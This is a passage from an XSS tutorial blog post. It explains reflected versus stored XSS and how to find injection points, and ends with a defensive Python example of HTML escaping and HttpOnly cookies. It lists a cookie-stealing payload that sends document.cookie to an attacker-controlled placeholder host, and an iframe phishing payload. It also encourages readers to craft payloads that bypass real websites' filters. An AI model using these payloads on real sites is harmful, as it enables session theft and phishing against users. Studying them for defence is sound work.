So far we have covered a lot of ground; if you haven't read the other parts, I suggest you go through them first and then come back to this one. In this post I will try to go much deeper into XSS, but before that let's understand the main differences between reflected XSS and stored XSS, and then some cookie-related things.

Reflected XSS vs Stored XSS


  • The first and most basic difference: if you search for something on a website with a search box, your query is sent to the server and you get a result, but the query is not stored on the server. That is reflected XSS.
  • If what you enter is saved on the server or in its database, it becomes stored XSS, as the name suggests.



  • Reflected XSS is not seen by other users, because your payload is not saved on the server, and it will not execute in someone else's browser unless you send the victim a link with the payload included. A basic example: if you search for anything on a website with a search box, the result is shown only to you. It doesn't happen that you search for shoes on Amazon and the result shows up on someone else's mobile/PC.
  • Stored XSS, on the other hand, saves your payload on the server, so if someone else visits the page where you submitted it, the payload executes in their browser too. A basic example: comment anything on this blog and revisit this part 6 post after some time; you will see your comment loaded every time the page loads. If a payload were executed successfully here, everyone who visits this page would see it.


1. To find XSS you need to find a place where you can enter your string: a search box, a comment field, login, user registration, HTTP headers, or any other form that lets you enter input.

2. Now work out whether your string will be saved on the server or not. If it's a search box, it obviously will not be saved on the server; if it's a login or comment field, it will be.

Note: the payload for both kinds of XSS can be the same, but you have to work out how to craft your payload to bypass firewalls and other backend systems, because the payloads you find on Google, or the ones we are using, won't work on real-world websites; they were created by other people. Just try to find a way and figure it out. It's not that you can google it or ask me which payload will work here; that's not possible, and if it were, no website would be secure.

Malicious XSS Payloads

To steal the user's cookie
<img src=x onerror=this.src='http://yourwebsite/?c='+document.cookie>

If an attacker places this payload in a comment box, or sends it to the victim as a URL, then depending on the type of XSS (reflected or stored) the victim's cookie is sent to the attacker's website named in the payload as soon as the victim visits the page or URL, because that is what causes the payload to execute.

Phishing
<iframe src="google.com"></iframe>
If the attacker is able to execute this payload, he can cover the original website with a fake one. For example, if the attacker can execute this payload somewhere on Facebook, like a search box, and sends the link to the victim, then when the victim clicks the link he will see a fake website under the original Facebook URL.
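To show the defender's side of the two payloads above (the cookie stealer and the iframe cover), here is an added Python example that is not from the original post: a hypothetical comment renderer in its vulnerable and hardened forms, a parser-based check that shows which of the two still yields a live tag or on* handler for the payloads quoted on this page, and a Set-Cookie header with HttpOnly so document.cookie cannot read the session cookie at all. The comment template, sample comments and cookie name are constructed for the example.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Constructed sample comments: one harmless, plus the two payloads quoted in this post.
SAMPLE_COMMENTS = [
    "Nice post!",
    "<img src=x onerror=this.src='http://yourwebsite/?c='+document.cookie>",
    '<iframe src="google.com"></iframe>',
]

COMMENT_TEMPLATE = '<li class="comment">{body}</li>'  # hypothetical comment markup

def render_vulnerable(comment):
    """The stored-XSS sink: the saved comment is pasted into the page as raw HTML."""
    return COMMENT_TEMPLATE.format(body=comment)

def render_hardened(comment):
    """The fix: HTML-encode the comment so '<', '>', quotes and '&' become inert text."""
    return COMMENT_TEMPLATE.format(body=html.escape(comment, quote=True))

class TagAudit(HTMLParser):
    """Records the start tags and on* event-handler attributes a browser would act on."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))

def audit(fragment):
    """Return (tags, event handlers) that a browser would see in a rendered fragment."""
    parser = TagAudit()
    parser.feed(fragment)
    parser.close()
    return parser.tags, parser.handlers

def session_cookie_header(session_id):
    """Set-Cookie value for a session cookie that document.cookie cannot read (HttpOnly)."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True  # blocks the document.cookie read the payload relies on
    jar["session"]["secure"] = True    # only ever sent over HTTPS
    return jar.output(header="").strip()

if __name__ == "__main__":
    for comment in SAMPLE_COMMENTS:
        print(audit(render_vulnerable(comment)), audit(render_hardened(comment)))
    print(session_cookie_header("demo-session-id"))
```

With the vulnerable renderer the img payload yields an extra tag carrying an onerror handler; with the hardened renderer only the template's own li tag survives.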
